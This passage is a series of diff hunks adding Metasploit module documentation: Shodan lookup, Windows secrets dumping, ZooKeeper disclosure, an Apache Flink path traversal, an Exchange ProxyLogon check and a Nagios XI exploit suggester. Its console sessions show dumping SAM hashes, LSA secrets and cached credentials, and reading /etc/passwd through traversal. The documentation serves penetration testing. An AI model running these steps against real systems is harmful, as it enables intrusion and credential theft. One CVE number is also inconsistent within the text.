6. If the execution is successful, the port opening status of the target server will be obtained
## Options
**RHOSTS**
The target machine(s) whose port information will be obtained from Shodan
**SHODAN_APIKEY**
This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
**Proxies**
A proxy chain of format type:host:port[,type:host:port][...] that will be used to establish the connection to the Shodan servers.
## Scenarios
### Single IP
Running the module against a real system (in this case, the Google DNS server):
```
msf6 > use auxiliary/gather/shodan_host
msf6 auxiliary(gather/shodan_host) > show options
Module options (auxiliary/gather/shodan_host):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SHODAN_APIKEY yes The SHODAN API key
msf6 auxiliary(gather/shodan_host) > set RHOSTS 8.8.8.8
RHOSTS => 8.8.8.8
msf6 auxiliary(gather/shodan_host) > set SHODAN_APIKEY *redacted*
SHODAN_APIKEY => *redacted*
msf6 auxiliary(gather/shodan_host) > run
[*] Running module against 8.8.8.8
[+] 8.8.8.8:53
[*] Auxiliary module execution completed
msf6 auxiliary(gather/shodan_host) >
```
### Domain Name
```
msf6 > use auxiliary/gather/shodan_host
msf6 auxiliary(gather/shodan_host) > show options
Module options (auxiliary/gather/shodan_host):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SHODAN_APIKEY yes The SHODAN API key
msf6 auxiliary(gather/shodan_host) > set RHOSTS www.google.com
RHOSTS => www.google.com
msf6 auxiliary(gather/shodan_host) > set SHODAN_APIKEY *redacted*
SHODAN_APIKEY => *redacted*
msf6 auxiliary(gather/shodan_host) > run
[*] Running module against 172.217.12.36
[+] 172.217.12.36:80
[+] 172.217.12.36:443
[*] Running module against 2607:f8b0:4000:815::2004
[-] The target IP address has not been scanned by Shodan!
[*] Auxiliary module execution completed
msf6 auxiliary(gather/shodan_host) >
```
@@ -0,0 +1,176 @@
## Vulnerable Application
### Description
The `windows_secrets_dump` auxiliary module dumps SAM hashes and LSA secrets
(including cached creds) from the remote Windows target without executing any
agent locally. First, it reads as much data as possible from the registry and
then save the hives locally on the target (%SYSTEMROOT%\\random.tmp).
Finally, it downloads the temporary hive files and reads the rest of the data
from it. These temporary files are removed when it's done.
This modules takes care of starting or enabling the Remote Registry service if
needed. It will restore the service to its original state when it's done.
This is a port of the great Impacket `secretsdump.py` code written by Alberto
Solino. Note that the `NTDS.dit` technique has not been implement yet. It will
be done in a next iteration.
### Setup
A privileged user is required to run this module, typically a local or domain
Administrator. It has been tested against multiple Windows versions, from
Windows XP/Server 2003 to Windows 10/Server version 2004.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/gather/windows_secrets_dump`
3. Do: `set RHOSTS <target>` (Windows host)
4. Do: `set SMBUser <username>` (privileged user)
5. Do: `set SMBDomain <domain name>` (only for domain users)
6. Do: `set SMBPass <password>`
7. Do: `run`
8. You should get the dump result displayed
9. Do: `hosts`
10. Verify the host information is there
11. Do: `services`
12. Verify the service information is there
13. Do: `creds`
14. Verify the dumped credentials are there
13. Do: `notes`
14. Verify the notes are there
## Options
Apart from the standard SMB options, no other specific options are needed.
## Scenarios
The data shown below has been altered with random data to avoid exposing
sensitive information.
### Windows 10 Version 1809
```
msf6 > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > options
Module options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.68.43.12
RHOSTS => 192.68.43.12
msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser msfuser
SMBUser => msfuser
msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass mypasswd
SMBPass => mypasswd
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.68.43.12
[*] 192.68.43.12:445 - Service RemoteRegistry is in stopped state
[*] 192.68.43.12:445 - Starting service...
[*] 192.68.43.12:445 - Retrieving target system bootKey
[+] 192.68.43.12:445 - bootKey: 0x3d354aa5e14d4360a1cc378a9e47338c
[*] 192.68.43.12:445 - Saving remote SAM database
[*] 192.68.43.12:445 - Dumping SAM hashes
[*] 192.68.43.12:445 - Password hints:
No users with password hints on this system
[*] 192.68.43.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b7759c83c817e8b0082fb322bce0073b:::
msfuser:1001:aad3b435b51404eeaad3b435b51404ee:035ad5f5a5c251c6fc3ba367bee86858:::
[*] 192.68.43.12:445 - Saving remote SECURITY database
[*] 192.68.43.12:445 - Decrypting LSA Key
[*] 192.68.43.12:445 - Dumping LSA Secrets
$MACHINE.ACC
MYDOMAIN\MYDESKTOP$:aes256-cts-hmac-sha1-96:8f84e173f9a44708b56806e3d5ee9fa4d21c8edd0da7d29d64cf6122de399b07
MYDOMAIN\MYDESKTOP$:aes128-cts-hmac-sha1-96:324719fca31fb90274acbd0bf07abf00
MYDOMAIN\MYDESKTOP$:des-cbc-md5:7561afef18d6e7bb
MYDOMAIN\MYDESKTOP$:aad3b435b51404eeaad3b435b51404ee:0cb18b83ab17e808b6604175784e8ec2:::
DPAPI_SYSTEM
dpapi_machinekey: 0xa197fe18d264c79b0996b3a987fcd6ea3b6191a6
dpapi_userkey: 0xab025408f16dc46e6ba79a559751ea4890daf97b
L$ASP.NETAutoGenKeysV44.0.30319.0
09 5a a2 cf 23 a2 09 ee 4e 55 7b e4 53 98 5c 6c |.Z..#...NU{.S.\l|
6d cb 41 00 c8 18 4a 58 95 15 c6 56 98 fe da 79 |m.A...JX...V...y|
71 d8 43 50 6f 23 f7 0b b9 97 50 d8 b2 a4 4c c9 |q.CPo#....P...L.|
43 e6 45 23 ec ec 43 72 8c 1f 50 ad 52 a2 64 92 |C.E#..Cr..P.R.d.|
4a 03 8e be b6 fc 85 4b 65 e3 d0 c7 66 34 0b 14 |J......Ke...f4..|
13 ae e7 13 c8 25 6b f1 be 55 a4 fe de fa 4b 1d |.....%k..U....K.|
0a f5 4d 68 ea 3c 3b 65 d1 69 eb 70 5b 7d 35 1c |..Mh.<;e.i.p[}5.|
97 d6 e0 d1 15 65 4e 52 dc 1e 11 9e 35 6a 82 59 |.....eNR....5j.Y|
30 98 e1 d2 64 0e 2c 2b 4c dd e6 fd 02 36 21 c1 |0...d.,+L....6!.|
54 e0 18 7c e0 56 ee 25 4b ab b9 75 70 d2 cf c9 |T..|.V.%K..up...|
38 8e 06 20 31 75 ca 52 d3 9f 6d 99 80 9c f1 ab |8.. 1u.R..m.....|
56 51 e3 de 62 be d4 bb ce f7 6b 9c f5 88 74 a7 |VQ..b.....k...t.|
54 29 51 47 3b e2 9b 7a |T)QG;..z|
Hex string: 095aa2cf23a209ee4e557be453985c6c6dcb4100c8184a589515c65698feda7971d843506f23f70bb99750d8b2a44cc943e64523ecec43728c1f50ad52a264924a038ebeb6fc854b65e3d0c766340b1413aee713c8256bf1be55a4fedefa4b1d0af54d68ea3c3b65d169eb705b7d351c97d6e0d115654e52dc1e119e356a82593098e1d2640e2c2b4cdde6fd023621c154e0187ce056ee254babb97570d2cfc9388e06203175ca52d39f6d99809cf1ab5651e3de62bed4bbcef76b9cf58874a7542951473be29b7a
NL$KM
40 76 27 cd 14 f9 b3 6e a5 19 fd 03 bd c7 d9 99 |@v'....n........|
f2 b0 91 78 44 80 e7 b3 7d b6 4f 26 0a 61 8c 6f |...xD...}.O&.a.o|
c5 20 e2 65 de ef 98 13 92 e8 db c9 51 3b 5a c2 |. .e........Q;Z.|
fd 19 66 e6 e9 cd 4f 11 ec 08 82 1b 16 be 41 38 |..f...O.......A8|
Hex string: 407627cd14f9b36ea519fd03bdc7d999f2b091784480e7b37db64f260a618c6fc520e265deef981392e8dbc9513b5ac2fd1966e6e9cd4f11ec08821b16be4138
[*] 192.68.43.12:445 - Decrypting NL$KM
[*] 192.68.43.12:445 - Dumping cached hashes
[*] 192.68.43.12:445 - Hashes are in 'mscash2' format
MYDOMAIN/msfuser:$DCC2$10240#msfuser#86d8081dd11a232080037a83f2165732:MYDOMAIN.INTERNAL:MYDOMAIN
[*] 192.68.43.12:445 - Cleaning up...
[*] 192.68.43.12:445 - Stopping service RemoteRegistry...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.68.43.12 MYDESKTOP Unknown device
msf6 auxiliary(gather/windows_secrets_dump) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.68.43.12 445 tcp smb open Module: auxiliary/gather/windows_secrets_dump, last negotiated version: SMBv3 (dialect = 0x0311)
msf6 auxiliary(gather/windows_secrets_dump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.68.43.12 192.68.43.12 445/tcp (smb) MYDOMAIN\msfuser MYDOMAIN/msfuser:$DCC2$10240#msfuser#86d8081dd11a232080037a83f2165732:MYDOMAIN.INTE (TRUNCATED) MYDOMAIN Nonreplayable hash mscash2
192.68.43.12 192.68.43.12 445/tcp (smb) Guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
192.68.43.12 192.68.43.12 445/tcp (smb) Administrator aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
192.68.43.12 192.68.43.12 445/tcp (smb) WDAGUtilityAccount aad3b435b51404eeaad3b435b51404ee:b7759c83c817e8b0082fb322bce0073b NTLM hash nt,lm
192.68.43.12 192.68.43.12 445/tcp (smb) msfuser aad3b435b51404eeaad3b435b51404ee:035ad5f5a5c251c6fc3ba367bee86858 NTLM hash nt,lm
192.68.43.12 192.68.43.12 445/tcp (smb) MYDOMAIN\MYDESKTOP$ aad3b435b51404eeaad3b435b51404ee:0cb18b83ab17e808b6604175784e8ec2 MYDOMAIN NTLM hash nt,lm
192.68.43.12 192.68.43.12 445/tcp (smb) MYDOMAIN\MYDESKTOP$ MYDOMAIN\MYDESKTOP$:aes256-cts-hmac-sha1-96:8f84e173f9a44708b56806e3d5ee9fa4d21c8ed (TRUNCATED) MYDOMAIN Password
192.68.43.12 192.68.43.12 445/tcp (smb) MYDOMAIN\MYDESKTOP$ MYDOMAIN\MYDESKTOP$:aes128-cts-hmac-sha1-96:324719fca31fb90274acbd0bf07abf00 MYDOMAIN Password
192.68.43.12 192.68.43.12 445/tcp (smb) MYDOMAIN\MYDESKTOP$ MYDOMAIN\MYDESKTOP$:des-cbc-md5:7561afef18d6e7bb MYDOMAIN Password
192.68.43.12 192.68.43.12 445/tcp (smb) DefaultAccount aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
msf6 auxiliary(gather/windows_secrets_dump) > notes
Notes
=====
Time Host Service Port Protocol Type Data
---- ---- ------- ---- -------- ---- ----
2020-08-13 12:20:16 UTC 192.68.43.12 smb 445 tcp host.boot_key "3d354aa5e14d4360a1cc378a9e47338c"
2020-08-13 12:20:20 UTC 192.68.43.12 smb 445 tcp host.lsa_key "0483f343addb39221136da0a0f52397aef02e6ee5d8bd05d49390ab97e05dc45"
2020-08-13 12:20:20 UTC 192.68.43.12 smb 445 tcp dpapi.machine_key "a197fe18d264c79b0996b3a987fcd6ea3b6191a6"
2020-08-13 12:20:20 UTC 192.68.43.12 smb 445 tcp dpapi.user_key "ab025408f16dc46e6ba79a559751ea4890daf97b"
2020-08-13 12:20:20 UTC 192.68.43.12 smb 445 tcp host.nlkm_key "40000000000000000000000000000000407627cd14f9b36ea519fd03bdc7d999f2b091784480e7b37db64f260a618c6fc520e265deef981392e8dbc9513b5ac2fd1966e6e9cd4f11ec08821b16be4138e0dd79c41522331dcc5005d731c1738f"
2020-08-13 12:20:21 UTC 192.68.43.12 smb 445 tcp user.cache_info "Username: msfuser; Iteration count: 10 -> real 10240; Last login: 2020-08-01 20:00:02 +0100; DNS Domain Name: MYDOMAIN.INTERNAL; UPN: msfuser@mydomain.internal; Effective Name: msfuser; Full Name: msfuser; Logon Script: ; Profile Path: ; Home Directory: ; Home Directory Drive: ; User ID: 1004; Primary Group ID: 513; Additional groups: 513; Logon domain name: MYDOMAIN"
```
@@ -0,0 +1,126 @@
### Description
This module targets Apache ZooKeeper service instances to extract information about the system environment, and service statistics.
### Verification Steps
```
msf5 > use auxiliary/gather/zookeeper_info_disclosure
msf5 auxiliary(gather/zookeeper_info_disclosure) > set rhosts 1.3.3.7
msf5 auxiliary(gather/zookeeper_info_disclosure) > show options
Name: Apache ZooKeeper Information Disclosure
Module: auxiliary/gather/zookeeper_info_disclosure
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-10-14
Provided by:
Karn Ganeshen <KarnGaneshen@gmail.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 1.3.3.7 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 2181 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 30 yes Timeout for the probe
Description:
Apache ZooKeeper server service runs on TCP 2181 and by default, it
is accessible without any authentication. This module targets Apache
ZooKeeper service instances to extract information about the system
environment, and service statistics.
References:
https://zookeeper.apache.org/doc/current/zookeeperAdmin.html
msf5 auxiliary(gather/zookeeper_info_disclosure) > run
[*] 1.3.3.7:2181 - Using a timeout of 30...
[*] 1.3.3.7:2181 - Verifying if service is responsive...
[+] 1.3.3.7:2181 - Service looks fine. Going ahead with extraction..
[*] 1.3.3.7:2181 - Dumping environment info...
[+] 1.3.3.7:2181 - Environment:
zookeeper.version=3.4.9-1757313, built on 08/23/2016 06:50 GMT
host.name=localhost.localdomain
java.version=1.8.0_162
java.vendor=Oracle Corporation
java.home=/usr/lib/jvm/jdk1.8.0_162/jre
java.class.path=/var/lib/zookeeper/bin/../build/classes:/var/lib/zookeeper/bin/../build/lib/*.jar:/var/lib/zookeeper/bin/../lib/slf4j-log4j12-1.6.1.jar:/var/lib/zookeeper/bin/../lib/slf4j-api-1.6.1.jar:/var/lib/zookeeper/bin/../lib/netty-3.10.5.Final.jar:/var/lib/zookeeper/bin/../lib/log4j-1.2.16.jar:/var/lib/zookeeper/bin/../lib/jline-0.9.94.jar:/var/lib/zookeeper/bin/../zookeeper-3.4.9.jar:/var/lib/zookeeper/bin/../src/java/lib/*.jar:/var/lib/zookeeper/bin/../conf:
java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.io.tmpdir=/tmp
java.compiler=<NA>
os.name=Linux
os.arch=amd64
os.version=3.10.62-ltsi
user.name=root
user.home=/root/
user.dir=/opt/data/zookeeper
[+] 1.3.3.7:2181 - File saved in: /root/.msf4/loot/20201013203537_default_1.3.3.7_environlog_604018.txt
[*] 1.3.3.7:2181 - Dumping statistics about performance and connected clients...
[+] 1.3.3.7:2181 - Zookeeper version: 3.4.9-1757313, built on 08/23/2016 06:50 GMT
Clients:
/1.3.3.6:33935[0](queued=0,recved=1,sent=0)
/1.3.3.13:39682[1](queued=0,recved=526446,sent=526446)
/1.3.3.12:60371[1](queued=0,recved=526234,sent=526279)
/1.3.3.12:60373[1](queued=0,recved=596717,sent=596727)
/1.3.3.13:51193[1](queued=0,recved=78915,sent=78917)
/1.3.3.13:49457[1](queued=0,recved=538585,sent=540938)
Latency min/avg/max: 0/0/20
Received: 2267148
Sent: 2269515
Connections: 6
Outstanding: 0
Zxid: 0x300000c6c
Mode: follower
Node count: 1041
[+] 1.3.3.7:2181 - File saved in: /root/.msf4/loot/20201013203537_default_1.3.3.7_statlog_417795.txt
[*] 1.3.3.7:2181 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(gather/zookeeper_info_disclosure) >
msf5 auxiliary(gather/zookeeper_info_disclosure) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
1.3.3.7 environ-log ZooKeeper Environment Log text/plain ZooKeeper /root/.msf4/loot/20201013203537_default_1.3.3.7_environlog_604018.txt
1.3.3.7 stat-log ZooKeeper Stat Log text/plain ZooKeeper /root/.msf4/loot/20201013203537_default_1.3.3.7_statlog_417795.txt
msf5 auxiliary(gather/zookeeper_info_disclosure) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
1.3.3.7 2181 tcp zookeeper open Apache Zookeeper: 3.4.13-2--1
msf5 auxiliary(gather/zookeeper_info_disclosure) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
1.3.3.7 localhost Linux device Linux amd64 3.10.0-1062.12.1.el7.x86_64
```
@@ -0,0 +1,105 @@
## Vulnerable Application
This module exploits an unauthenticated directory traversal vulnerability
in [Apache Flink](https://flink.apache.org) versions 1.11.0 <= 1.11.2.
The JobManager REST API fails to validate user-supplied log file paths,
allowing retrieval of arbitrary files with the privileges of the web server user.
This module has been tested successfully on:
* Apache Flink version 1.11.2 on Ubuntu 18.04.4.
## Verification Steps
```sh
wget 'https://archive.apache.org/dist/flink/flink-1.11.2/flink-1.11.2-bin-scala_2.11.tgz'
tar zxvf flink-1.11.2-bin-scala_2.11.tgz
cd flink-1.11.2/
./bin/start-cluster.sh
```
Metasploit:
1. `./msfconsole`
1. `use auxiliary/scanner/http/apache_flink_jobmanager_traversal`
1. `set rhosts <rhost>`
1. `set filepath <file path>`
1. `run`
## Options
### FILEPATH
The path to the file to read (Default: `/etc/passwd`)
### DEPTH
Depth for path traversal (Default: `10`)
## Scenarios
### Apache Flink version 1.11.2 on Ubuntu 18.04.4
```
msf6 > use auxiliary/scanner/http/apache_flink_jobmanager_traversal
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set rhosts 172.16.191.195
rhosts => 172.16.191.195
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > check
[*] 172.16.191.195:8081 - The target appears to be vulnerable. Apache Flink version 1.11.2 appears vulnerable.
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set filepath /etc/passwd
filepath => /etc/passwd
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > run
[*] Downloading /etc/passwd ...
[+] Downloaded /etc/passwd (2401 bytes)
[+] File /etc/passwd saved in: /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > cat /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
[*] exec: cat /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) >
```
@@ -0,0 +1,62 @@
## Vulnerable Application
CVE-2021-28855 is a pre-authentication SSRF (Server Side Request Forgery) which allows an attacker to
bypass authentication by sending specially crafted HTTP requests. This vulnerability is part of an attack
chain used to perform an RCE (Remote Code Execution).
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013,
Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).
### Introduction
An issue was discovered in Microsoft Exchange Server that allows an attacker bypassing the authentication and
impersonating as the admin (CVE-2021-26855). By chaining this bug with another post-auth arbitrary-file-write
vulnerability to get code execution (CVE-2021-27065).
As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server.
All components are vulnerable by default.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/scanner/http/exchange_proxylogon`
3. Do: `set RHOSTS [IP]`
4. Do: `run`
## Options
### METHOD
HTTP Method to use for the check (only). Default: POST
## Scenarios
```
msf6 auxiliary(scanner/http/exchange_proxylogon) > options
Module options (auxiliary/scanner/http/exchange_proxylogon):
Name Current Setting Required Description
---- --------------- -------- -----------
METHOD POST yes HTTP Method to use for the check. (Accepted: GET, POST)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.20.2.110 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/exchange_proxylogon) > run
[+] https://172.20.2.110:443 - The target is vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/exchange_proxylogon) >
```
## References
1. <https://proxylogon.com/>
2. <https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse>
3. <https://aka.ms/exchangevulns>
@@ -0,0 +1,173 @@
## Vulnerable Application
The module detects the version of Nagios XI running on a target and suggests matching exploit modules based on the version number.
The module takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to
authenticate to the target and obtain the version number, which is only revealed to authenticated users.
When used to target a specific host, the module requires valid credentials for a Nagios XI account.
These can be provided via `USERNAME` and `PASSWORD` options.
Alternatively, it is possible to provide a specific Nagios XI version number via the `VERSION` option.
In that case, the module simply suggests matching exploit modules and does not probe the target(s).
The module is able to recommend the following modules based on the target's Nagios XI version:
- exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce (CVE-2019-15949)
- exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce (CVE-2020-35578)
- exploit/linux/http/nagios_xi_mibs_authenticated_rce (CVE-2020-5791)
- exploit/linux/http/nagios_xi_snmptrap_authenticated_rce (CVE-2020-5792)
### Setting up Nagios XI for testing
Vulnerable Nagios XI versions are available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
Detailed installation instructions are available
[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/scanner/http/nagios_xi_scanner`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for a valid Nagios XI account]`
5. Do: `set PASSWORD [password for a valid Nagios XI account]`
6. Do: `run`
## Options
### FINISH_INSTALL
If this is set to `true`, the module will try to finish installing Nagios XI on targets where the installation has not been completed.
This includes signing the license agreement. The default value is `false`.
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.
### VERSION
The Nagios XI version to check against existing exploit modules. If this option is selected,
the module will not probe the target, so it is not necessary to provide credentials.
## Scenarios
### Nagios XI 5.6.5 running on CentOS 7
```
msf6 > use auxiliary/scanner/http/nagios_xi_scanner
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set password nagiosadmin
password => nagiosadmin
msf6 auxiliary(scanner/http/nagios_xi_scanner) > show options
Module options (auxiliary/scanner/http/nagios_xi_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so
. This includes signing the license agreement.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.14 yes The target host(s), range CIDR identifier, or hosts file with synt
ax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME nagiosadmin no Username to authenticate with
VERSION no Nagios XI version to check against existing exploit modules
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable to the following 4 exploit(s):
[*]
[*] CVE-2019-15949 exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
[*] CVE-2020-35578 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*] CVE-2020-5792 exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] CVE-2020-5791 exploit/linux/http/nagios_xi_mibs_authenticated_rce
[*]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Nagios XI 5.7.9 version provided via VERSION
```
msf6 > use auxiliary/scanner/http/nagios_xi_scanner
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set version 5.7.9
version => 5.7.9
msf6 auxiliary(scanner/http/nagios_xi_scanner) > show options
Module options (auxiliary/scanner/http/nagios_xi_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so
. This includes signing the license agreement.
PASSWORD no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.14 yes The target host(s), range CIDR identifier, or hosts file with synt
ax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME nagiosadmin no Username to authenticate with
VERSION 5.7.9 no Nagios XI version to check against existing exploit modules
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
[+] Version 5.7.9 matches the following 1 exploit(s):
[*]
[*] CVE-2020-35578 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Nagios XI 5.7.5 - incomplete installation, FINISH_INSTALL set to true
```
